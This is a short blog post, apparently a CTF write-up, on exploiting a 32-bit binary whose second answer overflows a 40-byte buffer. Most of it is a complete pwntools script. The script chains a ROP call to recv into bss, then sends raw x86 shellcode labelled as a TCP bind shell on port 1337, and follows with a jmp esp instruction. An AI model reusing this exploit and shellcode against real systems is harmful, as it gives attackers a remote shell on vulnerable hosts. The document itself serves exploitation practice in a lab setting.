Blog
This binary asks 2 question and answers are stored a array of size 128,1024 respectively but it's not enought to reach eip
but this binary copies our 2'nd ans to a smaller buffer of size 40 ultimately overflow to reach eip so the trivial solution is to execute shellcode
load the jmp esp instruction into RWX section ( mostly 0x8040b000) also while using recv@plt there must be 4 arguments
recv(fd,bss,size,flag) pass flag=0 as 4'th argument it is necessary ..
from pwn import *
import time
context.bits=32
recv=0x8048760
pop4ret = 0x8048f0c
bss=0x804b130
shellcode="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# TCP bind in port 1337
payload="A"*60
payload+=pack(recv)+pack(pop4ret)+pack(4)+pack(bss)+pack(2)+pack(0)+pack(bss)+shellcode+"\x90"*8+"\n"
#print "len of payload= %d"%len(payload)
r=remote('127.0.0.1',12345)
msg=r.recvuntil('Answer:')
print msg
print "[+] sending First answer"
r.send("Hello")
msg=r.recvuntil('Answer:')
print msg
print "[+] sending payload"
r.send(payload)
time.sleep(5)
print "[+] sending jmp inst"
r.send("\xff\xe4")
r.interactive()